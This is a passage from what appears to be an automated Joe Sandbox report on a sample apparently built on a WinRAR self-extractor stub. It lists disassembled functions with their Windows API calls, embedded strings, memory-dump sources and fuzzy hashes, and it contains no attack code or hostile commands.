                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                    • Part of subcall function 009105DA: _wcslen.LIBCMT ref: 009105E0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                  • String ID: ;%u$x%u$xc%u
                                                                                                  • API String ID: 3053425827-2277559157
                                                                                                  • Opcode ID: 952fa24c76272a0b9d6a3dc2f30fbdd618d37270f1d6ae01faff1c67d6c788ef
                                                                                                  • Instruction ID: b85d35a7b3fe0ea840d827f7a0f8df19ae2d4b264e2da54869766a40b9df9e19
                                                                                                  • Opcode Fuzzy Hash: 952fa24c76272a0b9d6a3dc2f30fbdd618d37270f1d6ae01faff1c67d6c788ef
                                                                                                  • Instruction Fuzzy Hash: 60F1D5B16043409FDB25DB28C499BFE779A5FD4300F084A69FDCA9B2C3CB649949C762
                                                                                                  Function 00919CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID: </p>$</style>$<br>$<style>$>
                                                                                                  • API String ID: 176396367-3568243669
                                                                                                  • Opcode ID: 1dcbd5a883e39e3912cd0fb426f3953d1c8166d6195513a7949e4a1682d13b20
                                                                                                  • Instruction ID: b9366d3a0abbc01191d86e5f0666863c0c02125f9e9a3e0b8310c605c62434cc
                                                                                                  • Opcode Fuzzy Hash: 1dcbd5a883e39e3912cd0fb426f3953d1c8166d6195513a7949e4a1682d13b20
                                                                                                  • Instruction Fuzzy Hash: 42510B6A74032B95DB349A25EC327F673E9DFA1750F69041AFDC18B2C0FB658DC18261
                                                                                                  Function 0092F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0092FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0092F6CF
                                                                                                  • __fassign.LIBCMT ref: 0092F74A
                                                                                                  • __fassign.LIBCMT ref: 0092F765
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0092F78B
                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0092FE02,00000000,?,?,?,?,?,?,?,?,?,0092FE02,00000000), ref: 0092F7AA
                                                                                                  • WriteFile.KERNEL32(?,00000000,00000001,0092FE02,00000000,?,?,?,?,?,?,?,?,?,0092FE02,00000000), ref: 0092F7E3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1324828854-0
                                                                                                  • Opcode ID: 7ed9157781fd0779bdc846aa8d343a926585f3499faa2ec924e53553097d3cff
                                                                                                  • Instruction ID: 5293531efb052fc7dee721015048d5f49bce42c7010ef64e5979016baef253dd
                                                                                                  • Opcode Fuzzy Hash: 7ed9157781fd0779bdc846aa8d343a926585f3499faa2ec924e53553097d3cff
                                                                                                  • Instruction Fuzzy Hash: 635194B1D042599FCB14CFA8EC55AEEFBF8EF09300F14416AE556E7255E670A940CBA0
                                                                                                  Function 00922900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00922937
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0092293F
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009229C8
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 009229F3
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00922A48
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: a8e575f73a213e1d75dc6a96136c370f865877d03139df4df213c38cc55db0c9
                                                                                                  • Instruction ID: 7af7e1dc26f956c3398e0a76dc5ba03ac4c10cacdee55f8eff8ef65d7b6a9da8
                                                                                                  • Opcode Fuzzy Hash: a8e575f73a213e1d75dc6a96136c370f865877d03139df4df213c38cc55db0c9
                                                                                                  • Instruction Fuzzy Hash: 9B41B334A00228BFCF10EF68D885A9EBBF5EF85324F148065E815AB396D735DA45CF91
                                                                                                  Function 00919ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00919EEE
                                                                                                  • GetWindowRect.USER32(?,00000000), ref: 00919F44
                                                                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 00919FDB
                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00919FE3
                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00919FF9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Show$RectText
                                                                                                  • String ID: RarHtmlClassName
                                                                                                  • API String ID: 3937224194-1658105358
                                                                                                  • Opcode ID: d4bacae031ee0a0a418614ea14686db5be921e3641508fcce7b81282d19c0f46
                                                                                                  • Instruction ID: 27b8b71b8ea80af621d99c62c608737bcfe56ab938da4a4fd05241488cddd272
                                                                                                  • Opcode Fuzzy Hash: d4bacae031ee0a0a418614ea14686db5be921e3641508fcce7b81282d19c0f46
                                                                                                  • Instruction Fuzzy Hash: 0241023120C218BFCB215F64DC48BABBBA8FF4A741F018518F84999156CB74DE49DB65
                                                                                                  Function 00919955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                  • API String ID: 176396367-3743748572
                                                                                                  • Opcode ID: 140ac53adfad2d3e85d05bd3322625f620ab5e84f97c71b31f92013a4fde7ef7
                                                                                                  • Instruction ID: d4064aeb57cde6dcbdf4b44c083aca2bfa71eee9e4b24282630f8f9ac5c9a799
                                                                                                  • Opcode Fuzzy Hash: 140ac53adfad2d3e85d05bd3322625f620ab5e84f97c71b31f92013a4fde7ef7
                                                                                                  • Instruction Fuzzy Hash: 78313E3274435956DA30AF54AC52BF673A8EFD0720F60841EF48657280FA54BEC983A1
                                                                                                  Function 0092C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0092C868: _free.LIBCMT ref: 0092C891
                                                                                                  • _free.LIBCMT ref: 0092C8F2
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 0092C8FD
                                                                                                  • _free.LIBCMT ref: 0092C908
                                                                                                  • _free.LIBCMT ref: 0092C95C
                                                                                                  • _free.LIBCMT ref: 0092C967
                                                                                                  • _free.LIBCMT ref: 0092C972
                                                                                                  • _free.LIBCMT ref: 0092C97D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                  • Instruction ID: 3c0dfb6138e91cd9f92a1f2b68651aced76e0d28f0af1a4cdb420da0f5409db6
                                                                                                  • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                  • Instruction Fuzzy Hash: 451133B1581B24BAE520B7B1EC0BFCF7BAC9F84B00F508C15B29D660E6DA75B5098B50
                                                                                                  Function 0091E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0091E669,0091E5CC,0091E86D), ref: 0091E605
                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0091E61B
                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0091E630
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                  • API String ID: 667068680-1718035505
                                                                                                  • Opcode ID: 01dd19e35c685e15a15d2b8477c8b01802a544d14ade662547a367fcb65706ba
                                                                                                  • Instruction ID: 1695366888b60e7969f04a5606bafd1eb164810d6be2f5edfe998a28a2a521ae
                                                                                                  • Opcode Fuzzy Hash: 01dd19e35c685e15a15d2b8477c8b01802a544d14ade662547a367fcb65706ba
                                                                                                  • Instruction Fuzzy Hash: 0CF02B317952269B8F214F745C889EE22CD6E697C5385443DED46D3110EB58CCD0BF90
                                                                                                  Function 0091146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 009114C2
                                                                                                    • Part of subcall function 0090B146: GetVersionExW.KERNEL32(?), ref: 0090B16B
                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009114E6
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00911500
                                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00911513
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00911523
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00911533
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                  • String ID:
                                                                                                  • API String ID: 2092733347-0
                                                                                                  • Opcode ID: 54cab33aee53f46a65611ab1bb7b8c034a9511dc229a4bf86e93f32cceab18a5
                                                                                                  • Instruction ID: 8ad2a8198b731b6ea93d261816d70dc9fa9b194771fcd0d52036dff609b345b4
                                                                                                  • Opcode Fuzzy Hash: 54cab33aee53f46a65611ab1bb7b8c034a9511dc229a4bf86e93f32cceab18a5
                                                                                                  • Instruction Fuzzy Hash: CC31D775118346ABC704DFA8C88499BB7E8BF98714F008A1EF995C3210E734D549CBA6
                                                                                                  Function 00922AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00922AF1,009202FC,0091FA34), ref: 00922B08
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00922B16
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00922B2F
                                                                                                  • SetLastError.KERNEL32(00000000,00922AF1,009202FC,0091FA34), ref: 00922B81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: 18f4fbc5f4ecca807f344db9e534a70a4cd4e2ff56955c060d147d595caf628f
                                                                                                  • Instruction ID: 92fec404ad3c7eceba38ed24f76afa879afb8e6948c2a64c268083ffb92061ba
                                                                                                  • Opcode Fuzzy Hash: 18f4fbc5f4ecca807f344db9e534a70a4cd4e2ff56955c060d147d595caf628f
                                                                                                  • Instruction Fuzzy Hash: 8F01F23266E3327EAA242B757C89B2B2B5DEF92B74B70473AF510550E8EF154D00AA44
                                                                                                  Function 009297E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,00941030,00924674,00941030,?,?,00923F73,00000050,?,00941030,00000200), ref: 009297E9
                                                                                                  • _free.LIBCMT ref: 0092981C
                                                                                                  • _free.LIBCMT ref: 00929844
                                                                                                  • SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 00929851
                                                                                                  • SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 0092985D
                                                                                                  • _abort.LIBCMT ref: 00929863
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 3160817290-0
                                                                                                  • Opcode ID: 9e230a3e97bdf2ce2ed441f51d3a0623fb12506d3ef4d509eb0d7d180ec9fe6a
                                                                                                  • Instruction ID: 52ba6d069ce79f1e3f88317ceaa366e5ac754ff7b9a5a3b06d38322b60ac0cc5
                                                                                                  • Opcode Fuzzy Hash: 9e230a3e97bdf2ce2ed441f51d3a0623fb12506d3ef4d509eb0d7d180ec9fe6a
                                                                                                  • Instruction Fuzzy Hash: 8AF0283614863167C7123334BC0AB1B1A69DFD2770F290024F614961DEEE34880A5925
                                                                                                  Function 0091DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0091DC47
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091DC61
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091DC72
                                                                                                  • TranslateMessage.USER32(?), ref: 0091DC7C
                                                                                                  • DispatchMessageW.USER32(?), ref: 0091DC86
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0091DC91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                  • String ID:
                                                                                                  • API String ID: 2148572870-0
                                                                                                  • Opcode ID: d98189b7ddc9adcb8e9c8934288c3215fd6f169eccfd59fe9afe7ad49ad2f00b
                                                                                                  • Instruction ID: 1b83abb090edfb47d81c9f859d04ed138663634a2b0174419adbc99793a65a1e
                                                                                                  • Opcode Fuzzy Hash: d98189b7ddc9adcb8e9c8934288c3215fd6f169eccfd59fe9afe7ad49ad2f00b
                                                                                                  • Instruction Fuzzy Hash: DFF03C72B05219BBCB206BA5DD4CDCB7F6DEF42791B008411F50AD2050D675868ADBE0
                                                                                                  Function 0090C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 009105DA: _wcslen.LIBCMT ref: 009105E0
                                                                                                    • Part of subcall function 0090B92D: _wcsrchr.LIBVCRUNTIME ref: 0090B944
                                                                                                  • _wcslen.LIBCMT ref: 0090C197
                                                                                                  • _wcslen.LIBCMT ref: 0090C1DF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$_wcsrchr
                                                                                                  • String ID: .exe$.rar$.sfx
                                                                                                  • API String ID: 3513545583-31770016
                                                                                                  • Opcode ID: e693f18cf79c762d2dde300d7c6d2bc4fb023a64fb12dde562cee27a7554ece0
                                                                                                  • Instruction ID: 04defec1ca34ce5c91ecd3c2816710e0525351cf6f328e4f8561f51bf8ce36f6
                                                                                                  • Opcode Fuzzy Hash: e693f18cf79c762d2dde300d7c6d2bc4fb023a64fb12dde562cee27a7554ece0
                                                                                                  • Instruction Fuzzy Hash: E9411561544315EECB31AF648842B7A73B8EF80744F104A0EF9916B5C1EB658DC2C391
                                                                                                  Function 0091CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0091CE9D
                                                                                                    • Part of subcall function 0090B690: _wcslen.LIBCMT ref: 0090B696
                                                                                                  • _swprintf.LIBCMT ref: 0091CED1
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  • SetDlgItemTextW.USER32(?,00000066,0094946A), ref: 0091CEF1
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091CFFE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
